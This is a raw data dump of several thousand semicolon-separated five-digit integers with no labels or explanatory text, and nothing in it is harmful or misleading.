26994;49082;53695;22156;40829;61426;49355;35885;48158;38060;57988;31874;34672;64145;26241;27080;21346;33283;16318;65059;35173;41516;30109;24659;39118;26896;37085;49430;31368;52148;47230;61278;42552;38078;64038;38422;17757;28669;28307;64709;15303;62741;45585;58023;43119;15372;40315;66863;16268;29678;39370;24028;41130;31582;58740;41893;28509;19827;47037;26774;30758;22878;22887;40605;12104;17668;20673;58659;45740;43871;63924;12981;47734;14874;62131;65102;40973;60230;16749;20355;30979;24978;59630;44870;53682;27369;25707;12935;35045;26336;63898;14241;25651;31889;15042;16768;56537;39860;46866;16914;42392;14146;46380;23202;30009;60085;36149;14524;29348;13991;58330;30017;34520;37469;24955;56440;54144;43213;29102;39708;28734;59248;10858;40447;54733;29002;54569;65931;65133;27213;19379;14561;21707;32126;17033;28543;47068;31660;32644;41821;46136;64028;57847;45457;17973;66010;42279;32609;48474;27394;43866;57798;39114;50260;18724;53420;31598;50452;13725;64702;45580;58048;50938;28099;35094;53531;26300;55738;18567;10479;27717;62851;23294;40340;55853;51459;60040;45712;44077;50883;29420;31215;49041;55224;38122;56323;15274;36956;14105;64003;57057;34489;40577;11689;37532;45676;56683;61931;33913;31785;35929;55496;57558;26045;47465;55881;24921;50536;55278;48147;27772;24250;30346;34483;28349;13470;25842;39236;20065;33851;12579;40412;59577;63483;50954;64862;28435;40998;26603;56623;55801;61636;59592;30574;63369;61243;39577;29045;18320;25460;55377;61030;17075;43749;36677;62628;14057;50720;14651;35768;57173;18942;25601;24503;41128;44677;48995;45598;56379;16846;51148;59194;40580;43165;47593;14725;47489;37518;30757;58965;16038;33736;34272;46128;26927;32145;33924;31623;11379;18061;45431;13552;61827;15557;47079;33135;38185;50382;20000;20185;29395;61443;49570;49191;25891;31088;43748;46215;57165;16076;11691;24374;61316;49801;18100;31039;30884;62260;35828;10904;27478;39155;54367;40228;30804;61337;43907;17560;21615;22605;38935;48964;29510;31346;65923;28958;47274;14815;38790;12888;56538;15991;47082;26601;48871;18324;39910;63928;35486;54777;40290;13209;15826;16559;54668;66567;30416;11568;13203;51456;54107;52279;60036;59028;16838;57511;64216;36807;36335;23518;60102;49893;16021;15514;55719;46564;27220;13488;13766;60958;32659;52005;11017;62351;51037;65110;65680;52407;60782;13150;29858;15643;11453;29758;36763;15488;31038;13757;62692;57627;38795;36298;44202;54466;51795;16877;13599;47129;52895;11863;36249;44244;19398;53657;60079;52579;66052;18808;16785;38874;42653;13796;26631;52985;43287;51794;26911;46457;54985;16630;23678;36186;51436;41304;65187;29490;52138;12068;40102;56081;24556;59324;11880;41504;20901;40575;42514;17306;57559;22892;35789;17418;62808;10190;50263;56095;53224;49070;25201;55041;52462;65828;39241;61386;53038;58810;40499;25441;45171;48569;60595;10669;30782;50988;62004;39740;52827;43251;27949;14890;29127;63658;65643;18575;54885;30468;33267;37639;43795;63468;60632;42753;13783;56872;36081;47834;31628;56362;26398;26921;46085;44592;32362;34025;38465;42679;59466;37649;35358;58704;64567;64845;32384;31075;46310;53157;56483;56856;53433;59517;20287;39507;19877;36691;13524;58380;25478;50440;46179;28287;59333;29734;28955;59855;16132;45908;46734;32298;48307;44021;16478;35301;38948;15786;18130;16968;34735;60424;65237;20572;45312;33339;53351;20867;27178;30391;11073;39920;47227;50257;10310;51250;65484;62039;34345;17752;37585;31301;49479;45491;17478;36075;10931;26304;53621;46668;18155;35120;54578;65706;19741;61473;31159;57481;32792;11768;22832;22229;12635;14864;23210;25309;61663;57925;60523;33525;12697;48334;41245;18593;42929;36700;40583;58945;60754;57660;59550;28071;20501;10136;46517;34390;65730;12106;19324;39595;20913;21971;66288;65549;39427;50297;58139;40780;36536;11852;66599;63405;62440;61466;55445;50313;28470;13587;64802;52763;63653;47755;17019;36122;46301;39112;54924;46830;15199;64304;31615;63896;12307;59981;26626;26851;26936;32925;43995;53801;16889;25224;21812;61668;49258;36474;22003;35074;59576;30815;38323;63481;51468;12267;35193;55873;11263;15579;17771;18750;64793;54481;59617;32770;22476;35204;35387;18759;65217;42868;17977;37098;31126;20514;22510;63109;57688;21655;62404;33453;33901;57495;66117;40726;44332;24504;13231;30224;63627;52197;29385;25307;64881;49497;63385;47566;63318;15256;61542;23428;61267;49377;44476;56147;15973;21508;38977;23988;16269;18893;57000;63811;30882;13598;48585;24894;53879;66507;14077;13454;35103;18253;26192;34136;54560;62952;21227;66305;28455;50242;59054;32103;14806;19953;25973;52541;37174;13019;38362;31080;29635;13398;40842;12474;11879;50089;22080;38433;66083;17537;36631;40356;32652;32426;58337;55897;66817;43824;65976;37327;48924;47514;55148;63621;48192;43737;46512;25153;16561;57012;66382;24696;65409;46807;18461;43533;15570;22045;63678;39395;45343;57005;34665;35783;16499;54185;35128;60655;11306;51031;19948;40632;31394;33431;31103;48615;12802;12400;39844;40556;15842;64801;49469;28295;54714;22812;28888;54163;49579;10174;37255;66895;55714;11870;28909;27447;12716;56508;66583;11240;25506;18830;56207;12271;58433;35291;43515;22471;23333;42409;35344;54333;59518;45353;10075;21149;25332;25448;37971;22388;37054;41690;40892;15158;56962;48494;25782;62843;40192;16862;29034;66457;25694;40679;29403;60476;65659;61620;29722;65024;13097;12990;61689;15598;41994;18315;49239;61295;65369;41910;16978;58081;28753;63713;52711;29705;19061;15318;20084;19130;56801;16991;14737;29389;18856;53606;56250;47686;22173;25843;41101;33680;16925;63058;59549;41234;48720;33210;28703;59986;56934;33234;30511;61250;51611;63312;45856;47329;58759;39998;33361;27952;44216;27177;25356;17591;61347;62943;60089;46672;62994;40549;40051;24755;19327;29669;27915;28060;18508;30025;18028;18913;13665;36565;23378;26790;32743;48883;23239;25092;53210;11932;45556;22729;20193;16974;47899;26508;15939;20350;35407;57342;58956;29446;40795;41845;26717;14814;20874;22490;17779;35226;42481;55459;23683;39909;16843;13359;32281;50435;49525;27693;48896;30771;55506;10866;14500;30876;36740;47596;17827;28892;17574;30512;38423;37762;50493;54445;25709;37498;37064;41266;16422;66508;28859;10286;27430;38228;26372;47642;66389;13591;66480;40475;28915;46803;59018;66718;38909;42118;43616;14734;48434;16353;13684;26119;20801;64541;32297;49782;22922;45082;13225;24730;59552;25118;46201;32941;42755;38960;23495;51603;36991;26483;54848;40021;41747;34334;23977;37947;40798;58161;21453;54081;31965;51370;39200;35290;20855;54350;34090;26948;49958;36637;15369;25379;45445;62170;52424;15062;45956;43244;60627;39090;53099;51851;63053;18464;52490;17378;15895;11145;34759;40439;65235;38702;22583;41144;44473;14472;21161;66854;50577;18908;58283;24094;61323;60133;64733;15616;17460;28493;16811;45840;64759;15662;23644;59472;17319;29093;29308;64515;11040;47192;25533;52570;35071;60963;53882;22459;32660;64328;29188;63223;42432;46388;40007;16503;51531;43276;64742;66258;42767;49969;42451;15507;23000;51145;20313;35615;19418;47127;58631;25170;31748;16448;38102;42265;24637;15184;41000;14577;52933;23163;44115;26417;59897;34321;32509;55971;29489;64864;51806;18529;63083;45141;18766;17045;61034;22842;54053;30237;34039;10611;39650;32500;61408;24944;66185;64070;14578;41822;39474;20219;44701;38126;13849;33142;14133;25086;48761;13244;47077;34446;23354;55623;40546;49034;24841;38002;45874;21490;39086;28968;54954;30186;16867;26341;10576;28971;18222;59673;62450;21433;14879;38434;32257;57050;23049;31110;31499;54386;12617;33103;51437;65809;59602;25720;42942;29577;32709;21851;65171;15386;55955;43778;26920;14791;39827;57136;59565;46624;51647;20870;26149;61458;44230;34449;12200;61355;40214;47432;14388;14358;51368;52217;40121;19695;57180;63005;19532;15788;65424;10606;10691;22566;42319;30646;65812;27662;36592;22673;18466;54161;13748;18585;38707;19054;37694;17581;53455;20860;63676;45897;64344;61398;63738;55192;38463;30487;21044;20868;21552;39937;30359;44064;17497;32716;43855;61615;36291;64325;14072;18141;18410;45210;40274;15990;64873;13557;10064;57181;46975;53428;61084;33094;49145;42285;10463;39972;12483;45827;24323;31835;50755;18581;24369;42802;19315;14955;17719;44199;35855;32367;44779;45829;64803;44384;38611;15258;63815;39878;31781;43858;33258;26551;19048;39594;65817;30228;42719;61750;54699;37026;57016;53416;40587;24667;46464;53975;59042;65929;28110;10977;51408;63577;35647;26725;59467;20631;45318;36130;23525;39678;40730;30594;64166;38079;24562;14961;14870;15432;51537;62684;53790;49675;36520;63840;23043;52321;47423;50741;13949;48604;19006;50408;27496;42470;46726;19732;22376;21019;28368;48837;14869;53500;65808;61588;43001;58760;18051;62150;26330;65695;11596;28596;65189;44372;60776;59342;50034;30068;25329;40161;51670;47196;28885;31833;46151;39630;26924;51815;32552;26176;21194;38739;22596;40287;47641;14496;23410;57794;14775;10758;31030;12704;66547;65313;63154;38572;28369;29984;65870;48375;59809;16903;57999;35554;26234;41407;13038;33238;45272;32888;54313;55212;59295;13035;18672;34018;41476;61971;17626;62074;22609;13473;43711;11512;49188;40677;39761;25396;65750;64745;18870;25675;18270;41734;45465;27859;40078;32756;32215;49019;18676;43645;27497;15581;10998;60555;60826;12926;14602;31322;37522;42774;12582;60128;23583;16860;66852;13450;15412;19857;58102;21117;60308;35473;41041;47171;27619;46382;12513;58946;12344;36494;19572;19212;32997;64713;35479;22341;21525;21278;34746;31546;19733;21978;59116;10409;30606;57781;38514;30722;12950;42935;33876;11310;63386;46097;60347;19413;35535;24016;24632;50437;25529;40855;24950;59605;33380;63376;27119;24903;19075;64416;15625;54216;64753;43247;38116;59202;35545;29809;19735;24033;62364;49936;45320;28511;47110;40238;55804;46147;19399;15186;43337;50855;46544;51107;15176;55237;63917;19526;56807;52327;60500;56692;63373;18975;33558;14024;48304;55541;22544;20052;24727;33230;47567;34037;34235;57288;18636;34425;49262;29283;52038;48555;60502;58835;52063;49056;62903;21204;12044;54854;32970;45641;24925;42164;12830;51797;66620;35630;34214;41672;62376;48909;50611;21103;65458;34010;51346;52728;30427;10258;50732;13891;28238;45843;20465;51240;45951;54099;58848;57887;21526;40247;36096;54452;16395;17196;56211;36730;63402;60418;33980;27697;10300;55206;20692;31689;30244;28387;64678;24133;26869;37448;30579;65249;61988;34531;14766;65275;38392;63055;34637;31378;26248;32199;34960;60775;16441;59621;34477;57944;50157;65721;56949;34172;49315;66208;20223;22435;47027;20675;24371;62269;47346;41568;15394;35696;24350;52988;48740;20211;61150;12544;13279;23398;49114;10619;27661;52008;13012;57153;38380;19653;11675;62266;66683;50585;16986;22793;11975;45895;41173;41619;44094;20415;36568;49219;54536;61090;58422;40959;59711;10557;45889;48619;24859;22134;10502;62434;57693;57694;50887;20998;57102;49816;25384;40403;21279;48211;62728;47180;19513;32256;36874;26946;20164;35373;54353;18431;16192;25343;28870;64966;59541;65655;55737;30873;22822;17706;37844;15963;53698;55961;26503;14840;33765;35949;21872;61618;55367;61880;64502;64369;55338;23966;16884;22754;15639;47303;14682;27652;25808;22293;24172;18142;66654;26721;20590;40675;38407;37558;28581;56626;39652;19964;36878;29245;32214;44675;61603;50623;46507;53746;55566;50554;33359;17093;11966;30327;35321;43783;36909;19497;35068;53762;15339;65570;49531;29791;56520;26651;17206;61699;43762;31267;19999;14910;42180;32136;44188;24249;35430;66699;45571;50734;46772;29687;51039;62689;30337;61400;27909;58053;57261;42531;52796;11727;14393;14253;18646;26434;21450;48156;47531;52759;12798;26468;51605;49342;59337;18420;45814;43229;12501;26378;46399;54371;25706;51656;36680;26061;13508;17567;44511;32846;16130;43258;38604;62219;15719;10817;36629;51805;66845;18647;44295;22954;62195;41571;47774;35313;23642;10821;45386;27698;55607;40068;54327;29142;42394;11794;33428;20921;57597;11056;56791;63212;20407;14208;49055;45837;48756;30803;19371;13441;24312;17802;27727;58065;29220;56861;45275;40345;66161;11109;60976;66347;43675;27854;20298;41322;30522;37153;52435;31373;66302;49809;44297;35316;57047;46415;17568;66670;59328;41768;54892;57076;36440;17141;28699;63470;37889;54437;61018;37967;36107;62127;54100;64594;29868;14493;30051;63897;38825;54137;36491;63531;58157;27367;43875;65622;23902;22651;53067;11162;19149;65254;11291;56879;47780;66961;10569;11549;34809;33605;36064;38318;52872;45875;51440;35076;32231;18134;12479;24892;36526;57008;50917;33627;60999;59943;31487;14696;27457;17651;20374;52572;20893;25255;47731;18736;21976;10489;11277;52301;27421;40123;44572;14527;43981;13517;61518;16982;41495;35462;52734;30399;50244;30388;46547;30937;11800;10590;63693;63843;18578;66460;23766;29776;47779;32705;25598;57557;50800;19776;56999;65322;47157;48278;48526;12889;45415;63033;21461;44475;13103;31175;57049;28180;43781;54928;13959;11437;54611;38669;38858;60320;46072;30951;17005;47371;49478;36148;43613;57577;13017;48527;46890;16993;56702;55502;65160;33912;25930;55675;58718;65061;38479;31404;43962;49374;29679;41447;31358;66580;33494;13121;21738;65314;49492;34280;50121;30898;57248;66385;65473;32421;63583;19515;49518;10683;49243;39724;20302;45644;24038;24158;56374;30593;66748;15844;25130;54907;34060;19246;16141;37032;65300;28002;39538;32422;27805;61781;36918;66689;57034;17750;54988;16365;61899;32065;66103;55933;24693;60350;47420;17751;17392;32498;39115;20861;32051;40783;49476;22212;27200;60747;12762;24272;33831;37277;46112;21760;33293;64415;60091;43472;35960;29754;23774;14887;66223;65786;45993;39709;59938;14452;21087;11797;42948;20308;56478;56643;57725;17714;43683;65724;41314;14678;10415;50475;46155;51532;12832;55548;40704;11404;49820;19342;38774;62575;19243;50491;13020;18638;16716;46091;16621;15349;43283;25513;22414;52669;36885;52320;62297;40273;44589;16906;29634;20029;19749;34292;12706;41434;34825;12492;38665;15475;46342;20543;34355;60006;18002;21511;59306;50438;29330;30230;39505;33459;55886;51746;51106;55085;39897;18719;11047;54618;57717;34284;48238;53119;36600;35762;34163;12385;16959;15868;42158;20423;33824;17449;18977;34247;56811;19699;38959;53685;66093;37339;26200;64485;23421;57752;63411;58183;36422;19195;22791;60002;66789;63208;31922;45834;20160;27928;48681;14873;26868;41323;54895;21852;16407;16551;44284;57792;66075;49260;57617;49769;19927;36211;58028;38598;47185;31699;61255;24120;64002;35921;24818;59825;19510;65994;19095;41867;15114;56139;65930;48860;65778;63492;36478;29421;44577;39421;15888;41958;45988;18851;63650;20023;10156;47456;64622;36855;46065;24514;29424;46343;45434;29323;23672;25852;50908;17220;26512;41068;19417;27004;22232;27648;48150;47054;15063;47505;12420;56135;63178;65569;56033;42254;34756;59448;56271;34454;51822;11182;53948;31590;60003;15831;64773;19458;11614;52420;53355;24375;32898;63834;63703;64419;26470;28872;59551;33524;60456;58052;24630;35116;19674;46822;62152;25741;31776;19428;32200;63392;66697;33074;53353;33161;33152;28731;20880;28538;52841;11590;38018;55448;55855;41115;45020;17187;53431;63617;26620;16283;59192;36252;51288;28707;48365;38472;51544;63156;16409;37222;22352;21271;23778;44201;60100;50401;35323;60522;23442;61916;25313;18350;22393;37322;36665;18541;41087;50649;50230;39616;62045;49655;24672;55822;12280;17170;24889;59669;60646;65140;13799;53280;45691;66904;65907;12072;32345;24308;31176;66569;59735;27405;48323;17265;19176;54886;26648;14975;17720;16037;57087;31845;43477;33271;29595;15720;18671;31970;17167;56052;49065;39711;58095;15912;21324;14661;25116;10811;52376;24002;58877;25897;34223;33683;65199;11421;10410;39339;58189;22857;25998;44725;25101;51161;25115;40543;52589;27353;35773;56337;20467;57309;66796;48283;65504;17095;58158;20319;33528;58757;22007;15490;64893;63865;18741;27853;63450;38886;51568;58841;63014;38749;64859;52329;47416;31068;40761;22044;29704;38213;11194;15527;28188;14411;12343;13048;58110;49768;11808;11609;63770;44907;47106;13089;61817;42622;20256;16034;61133;50139;52037;46616;27820;48151;15837;41431;31396;33681;10915;35502;16644;38835;40388;36433;61015;13853;43248;39633;25122;65768;54914;16332;58453;14182;14808;22348;59970;59060;33412;52904;43277;62834;41031;40689;47787;47008;45217;30773;21682;42194;54417;47829;12007;26671;38899;58800;30304;34178;63064;29315;33399;21240;66351;38349;22720;30456;45303;58375;25124;24359;56155;44055;24792;42794;60729;37065;34001;55075;45823;45413;46448;55432;39815;29007;39561;58029;55430;60779;61329;34988;64890;46524;30049;65505;19310;20414;52286;10323;19372;59402;23589;30679;63726;13993;18510;21443;42882;39348;26845;11520;30059;63467;13175;34270;34047;27572;62895;64731;37570;59305;63067;33631;33439;54943;37094;35991;44604;60860;25922;26104;37954;26888;16942;57535;12947;25009;47627;25196;45439;52668;19256;18441;15396;28237;49923;43405;33618;56351;21604;27916;13951;59424;50543;39285;10769;20310;47406;64103;40949;51534;47625;65425;59399;36704;30056;27361;44246;16730;60704;32451;43225;41053;17405;24177;41728;26212;10453;26591;32129;35056;18914;46259;66792;36274;34108;36564;40642;18218;32642;31757;25468;22854;21468;62776;18897;40809;17113;45038;49814;57926;42466;55034;48674;13761;63824;53761;33251;27153;64465;23847;43814;21925;25445;19173;51773;34928;14336;53473;58795;44377;63310;32643;22128;47120;56680;20339;56047;60178;32105;45692;32710;14280;32193;42952;23107;27871;22200;46098;22735;56019;45987;61651;35480;16717;13933;55781;50159;38587;64163;34045;52878;10021;39030;43947;14627;46190;66937;33714;26773;60987;31314;49618;19925;31467;31460;38314;47637;65175;43335;23914;23220;49212;51304;14075;20333;53220;26408;10503;58120;49706;40702;33338;48503;32561;58561;20628;58206;66464;41141;54803;48788;49634;13313;18440;54642;43013;16223;15920;64086;53926;35268;11647;12966;60327;38342;13801;26521;25473;65990;21419;25213;31569;52655;23933;27151;34831;43508;41581;64750;55366;49470;24783;33309;50594;51371;59624;19451;49960;25704;27733;62380;10628;56236;28017;14344;29616;36678;37786;20847;56119;30780;39498;15644;34782;39429;48315;23228;52886;11181;12619;10545;43857;18536;49352;41030;32287;58368;18305;63342;24448;61532;64085;57156;52764;22129;31101;20973;51836;46359;54602;10072;30285;48510;52743;33424;11279;26289;52445;44081;27835;48759;43546;55133;64574;43076;33242;17529;19598;41028;11384;52124;64846;34896;35804;54825;56980;59286;12047;57672;55935;15999;15657;48415;55340;56498;26400;51533;13695;57422;18552;34484;58977;32990;26267;50637;21051;21814;36094;34405;65221;54630;53251;41638;26739;57911;64571;14302;52242;12394;50353;65635;37499;55012;55891;66790;46513;15496;23504;57699;44825;14403;66930;62262;51052;48938;12064;21246;35391;50427;63520;20074;37722;39194;43608;11726;49774;24423;28842;43242;28454;16363;38284;29166;57357;31533;59161;20903;28228;64797;46780;24328;31769;43502;66929;57078;53272;20081;66433;60458;24633;45158;15078;49970;41663;57276;26561;38778;28358;58284;47011;34406;60758;61679;58391;63904;16447;32169;46327;18645;45756;34237;34229;30128;49587;51306;41843;10914;19108;44221;29243;17322;62923;34088;66618;43389;14557;46135;49459;64007;32328;53094;41914;47067;35017;28226;35933;40801;32299;60068;51571;13378;65703;48789;66824;18412;65901;66781;18651;36952;12750;27324;32055;49921;34146;42418;30799;49466;48687;13363;46187;37678;24379;32104;16148;65682;57605;50394;60094;48678;24870;25865;56854;21337;20912;25635;24913;64556;14202;22845;54062;30401;53872;49449;29700;47387;60726;56513;11699;57441;29803;40503;46081;45357;37900;42673;48634;65746;11510;22722;56405;10855;43179;66771;21381;14093;24409;35262;40828;21570;17571;63757;40442;31692;51295;47293;25573;21141;15950;42184;55656;13705;50380;18787;13417;10663;29713;55261;15573;41596;58409;13871;37552;58353;27409;37939;12580;36587;19128;44992;22910;27603;42446;14154;55565;33328;66744;23622;44132;16688;24654;16924;63295;19124;26337;51122;29005;62768;14638;18848;48485;57785;53617;48676;28652;46578;21908;51058;14553;51991;44441;50276;18723;18523;18786;13070;26023;62300;61576;42163;39309;57484;45240;13143;41860;57505;58011;13057;20237;20326;29570;29035;31986;25498;16084;34784;39943;48509;57769;15721;44808;22495;64428;65718;17797;28716;64549;65358;53409;57433;49403;66663;49485;60229;61474;58524;12656;37635;30738;13827;18491;56390;50091;49455;56414;33079;27146;51024;44527;61209;63313;61110;44242;55493;41420;22164;55159;26801;23135;49204;66766;37471;12854;14002;25665;55073;13551;61672;34160;24759;66024;65376;48985;43523;13025;54003;27099;24960;34159;26098;53207;60167;48544;61276;22392;62946;13242;17147;56369;18200;50602;10396;50697;62142;28824;12048;43329;34602;20646;19411;64876;19727;52401;12812;64444;30331;30210;14244;39056;47581;56063;20904;16987;47644;11258;20684;52172;50913;21753;19746;18667;32393;48496;14446;50997;65665;48418;30795;53133;33047;48594;47810;63919;44092;42610;29871;15784;21638;22813;43189;13776;21815;43586;33563;55849;53789;49341;37184;22202;53291;28255;14584;62584;65312;57257;19252;60132;23172;42490;31542;46986;39894;14141;45549;55170;61421;52610;16124;11681;15360;23884;27488;46281;43999;57544;55032;36366;57555;53786;19069;35995;59172;45572;46841;41898;38527;26087;42672;11099;59810;31796;28372;46869;26796;41203;17150;40990;44588;38560;45680;14417;12328;36476;14747;23745;34981;57917;59276;25589;61413;40139;54596;25738;14170;45670;36993;16106;50805;26959;15087;31473;64417;60266;29862;58791;18768;58042;25263;46931;26646;63544;54109;46658;24742;51127;13671;28623;48388;45001;25078;34806;60761;20299;10306;24310;22950;24586;61826;46308;43404;18844;40562;45760;39502;52760;47866;61388;20564;23086;28122;34461;45891;41188;29066;54874;27365;49003;46283;37811;57330;66472;31611;44304;23669;36719;60849;18561;29701;65517;37583;41900;32172;55279;14074;20144;23100;22980;42751;63031;53020;42607;37104;53495;27984;16046;52466;42704;50423;41029;58067;42640;17061;52039;65268;26233;29618;49615;24099;31210;65231;25195;33479;34507;17048;51448;20315;52973;45904;48732;63557;32578;19554;28953;18033;29402;50075;54378;57879;41665;51599;63560;33128;55828;49127;41238;23537;18086;60938;16852;26049;13010;54524;32708;64520;54677;30352;55796;20723;62390;64472;54756;16555;31653;12761;10798;60514;18980;48440;22429;51157;56253;18976;23997;56799;45942;36311;20984;13115;32247;54462;44260;32212;11741;54213;30174;45633;18943;14800;44027;22195;37823;17115;41832;12763;66367;58136;48990;43219;36125;35183;54561;14107;20165;17374;29050;34179;58742;32879;49454;41244;48605;35752;41165;57147;47019;40721;28462;63724;59797;43052;28718;28732;31665;27326;61824;23604;51057;59080;48368;52640;42342;35706;20158;10747;40504;27770;60740;60250;19862;31818;21055;15607;50856;33073;64164;46718;43246;45922;12199;32376;28332;61897;17407;29926;46528;36043;34431;28964;46671;18714;12358;62094;43421;33535;43188;57364;50161;66144;29021;28176;23211;29608;10498;23319;13369;38098;22956;41931;19007;61294;45543;37059;63934;27489;32102;22515;37042;23174;15708;30206;32463;22430;49367;22247;12869;30491;30234;53637;39070;20697;42146;29823;10625;46148;59183;36257;33129;62395;52634;33896;42953;63209;10615;45590;60471;59933;35275;61502;26703;44481;51578;20965;11138;50149;65804;41519;64946;39044;64108;26674;40219;55861;63034;17448;42170;35410;66554;58692;66101;52593;28854;12473;37870;64739;12349;17838;65132;56395;27747;45785;39570;17327;55858;56674;14273;43614;10256;15466;61272;10434;61793;53525;37006;24974;49048;49719;60119;27787;33581;46994;18979;23715;39286;25896;47319;63471;43884;48672;29524;57412;36286;53324;51343;50250;64427;55571;16777;24525;63452;45232;53998;31602;62503;33655;47209;42204;56471;60055;49287;22863;48652;44615;60846;37293;63679;39020;49094;56783;37316;29702;24046;60807;63866;18454;12811;61111;27582;26342;21053;22640;49601;30037;13607;23133;56495;46116;42980;59262;59391;44098;61181;44395;28880;60882;13460;21105;39648;12983;23939;11100;58936;25286;51527;17635;40779;64948;58943;13656;21826;45067;20445;11816;54829;25063;58137;25825;12251;66787;53177;38368;13383;32412;18580;37572;61264;45477;58832;66236;59440;48209;57460;55517;26887;66734;61387;33794;33355;10361;25346;33922;38808;38483;15741;17124;55972;36922;29388;64949;60238;30989;58546;62256;29934;12367;63778;48437;65301;31235;47844;18935;53016;25430;44344;59646;13872;55046;49654;59081;31052;65062;57444;34253;29620;56812;21166;33366;26858;50200;27657;21476;45813;17133;44958;52215;32057;62092;15164;46124;27123;18818;20923;45253;64422;46644;15876;62355;34074;52206;53805;47675;64446;25472;28600;15081;57515;62294;52076;26173;58745;66945;31478;33829;59505;46590;29103;46104;49073;16062;26404;16414;22451;23948;17393;16907;35591;59648;22872;10263;32787;48272;48852;33109;24043;58490;30921;23179;46018;15308;25164;66227;54638;62148;46926;65988;38277;54574;29520;30258;37620;49280;37738;59204;58899;46662;20311;58218;20627;18001;33211;61981;52567;43599;13905;30822;33301;44558;62612;15702;58786;42069;22480;59066;29604;62956;65627;41634;50788;58501;64426;22428;50184;21803;16481;47177;52625;62570;14414;55444;16391;52700;50236;23720;56352;23376;10305;49689;17837;52057;31658;60168;15214;25238;11925;49521;62598;51029;59905;39979;14650;40706;43273;55263;10511;41507;50974;10504;15600;46566;36402;58551;36847;34289;23391;17183;41057;54097;63659;53187;39271;54598;11343;43903;39425;32286;49099;11377;23857;25669;59065;31939;30227;64625;32588;53408;46929;16003;30663;52116;50417;35688;32316;12018;58721;55702;47224;59678;22914;36164;33873;48537;24344;59950;28769;32140;48735;47758;13443;64856;34835;42084;63962;30962;12480;29537;56913;43004;66784;63434;49875;14150;38223;51641;28339;50093;38696;58128;47838;58414;34635;23439;55191;39600;39918;59531;55779;60600;29058;30192;12091;38003;33552;22672;30541;63015;58062;56188;39130;45034;33368;10284;38789;12944;31178;25803;35853;51985;52034;41584;52251;52314;41790;35201;48715;14574;45547;13501;63887;29997;52339;18996;54912;51359;50678;24178;42985;46760;18847;21875;53459;54356;15410;60544;13338;31157;13246;57052;62449;58645;28131;43569;48372;47453;34786;24518;25113;26188;50023;20869;14776;30834;19758;18929;50086;31743;37557;52945;63731;58618;14694;30508;54525;52562;58929;59686;61990;40707;58708;42335;47595;44009;23330;37381;29785;40790;47633;35876;35741;24900;46177;41772;24468;29762;64601;62176;12785;23908;11378;16674;33061;25052;33641;54426;23143;52419;35711;64350;65686;42326;29249;19158;56862;29311;21762;64798;11759;12674;58924;40974;54804;64561;24352;38781;11673;43861;15829;32634;21095;46713;64017;48844;50986;14989;66225;31816;44648;13865;41080;10295;48355;64560;43544;21983;53964;37445;32835;50658;20127;39064;33771;62916;52934;23251;24320;65516;57537;66002;13449;43433;36023;48698;26779;63853;19617;51751;35660;10518;40551;65671;59437;13824;15672;65991;23489;29291;42064;55806;54891;24242;65894;20593;57242;13201;32014;26576;43834;18468;12054;13087;14821;47040;19650;16856;51071;14102;24642;38387;38627;60214;40144;34197;51840;16424;40289;14098;35090;30529;42344;65422;13533;37676;19717;55954;45612;29305;59478;52735;52328;37451;44122;50181;25246;22509;17487;47440;60526;37880;41553;33219;48250;16798;16886;31707;16381;10490;41533;15326;51820;37041;11322;60626;11321;25018;55331;32534;43707;34791;43312;48468;45515;41429;46674;19200;15483;45160;20327;57593;56957;14863;34549;57881;36463;66089;55319;31120;56214;38266;39380;10476;26036;54515;44633;25553;29076;35716;64886;20812;33127;16915;28248;47197;24339;57198;53292;61718;26860;13590;17047;20548;15243;51979;53520;12042;35036;19083;19542;34654;34879;29908;10125;57456;21355;45910;51864;10697;59238;32930;45006;24537;49163;26527;12499;40732;42814;45368;61236;26863;65849;28831;59289;19440;45948;23524;35757;58788;58566;35796;54888;31140;52086;38623;22713;60243;13936;13319;35753;18612;60964;34547;39195;62818;33877;24129;62458;35178;44124;61404;50345;11583;60203;63908;43721;51405;54967;20494;38800;58286;42706;31434;15701;27769;55137;11710;62111;33510;41240;15865;49444;43543;59132;28120;16645;32255;64871;46077;39692;24976;49000;45403;61245;23264;41372;56329;43272;39632;29969;33536;14387;23065;19807;31397;15348;50586;43255;14020;48205;62428;18874;12453;54935;59537;30200;26230;45359;30465;56130;48399;59988;34012;45535;60228;36567;66913;34420;64812;53817;59831;31328;24566;53976;28937;61879;57130;26029;27701;53925;17112;49757;52186;36962;27700;58830;37875;48937;28657;27031;52930;60434;31034;45395;13876;30021;13098;51040;22101;44622;50862;44640;43828;10843;35043;36941;50546;42218;43158;50709;56343;54351;41891;45567;32448;37163;30146;59964;65799;50854;22160;61231;54297;14672;47656;14591;10429;57192;13399;62504;36831;38091;18572;57745;21186;41565;57314;29197;51464;16671;33695;54904;60818;49577;33325;64386;19282;51050;51964;46090;66366;30770;25056;19594;39900;29326;30389;57040;53883;32468;29976;42799;64238;66244;15556;61983;35517;44168;45394;16266;19028;23626;46897;41463;14652;27064;26781;55981;14217;27065;41145;39270;10391;51177;22359;62654;10020;24549;20790;37610;41878;60208;62754;55135;42990;22659;23980;17284;37145;44743;16135;19340;16476;16546;47646;64363;29547;51072;44235;41255;52600;19649;25388;48670;20279;20371;65915;45584;20802;66067;22363;13794;51837;56105;60680;37077;17808;51793;40863;13199;27702;45314;24196;34186;24183;11292;45654;45935;57589;44523;26072;51381;47349;18300;32543;54953;55576;46716;64820;65683;21236;27101;55300;60116;32366;43143;39504;15455;62319;63327;60436;11754;13377;59319;33344;43398;35872;66843;62187;52691;10809;19772;17984;11642;64456;30930;23840;18623;38092;23985;28113;44215;35131;62593;65557;55374;29503;25267;19015;66964;17412;42205;11472;22717;50971;29129;32613;50685;64157;37888;35185;59566;12268;60557;54498;32852;41439;59636;46376;22204;22798;12590;29508;48354;49049;19036;25221;40510;56668;13180;27431;25045;54937;54920;55617;18178;36757;20828;17134;62996;33934;22670;38533;58813;60981;12264;54001;22242;22031;37419;60575;61875;57377;65279;58892;65685;29689;48923;51621;19396;35533;24316;36058;58870;56647;63190;31212;32265;19302;17578;12636;30640;11241;33658;36806;62709;60123;30563;29409;32337;38239;14061;61296;33216;48180;24186;44890;54436;23334;23402;61587;47459;56516;60025;52352;50651;53758;47678;32390;30983;27154;43742;40476;32134;54613;29312;22967;62998;22368;32326;19001;60795;57937;31525;33067;12530;41705;49902;32928;55912;45866;66655;29337;64280;59359;57086;16763;30065;34659;27423;60851;34278;60837;14810;37190;39031;49305;46207;54259;21652;33684;64215;49808;66027;65287;38206;17696;16211;14264;24036;65015;50150;27094;41547;13998;25550;39873;51028;28554;27962;20989;20307;64436;34886;42735;24909;62532;28178;24871;40819;22861;41401;20884;13232;45629;46531;33313;10733;12415;18860;48571;56788;11860;29182;40840;53541;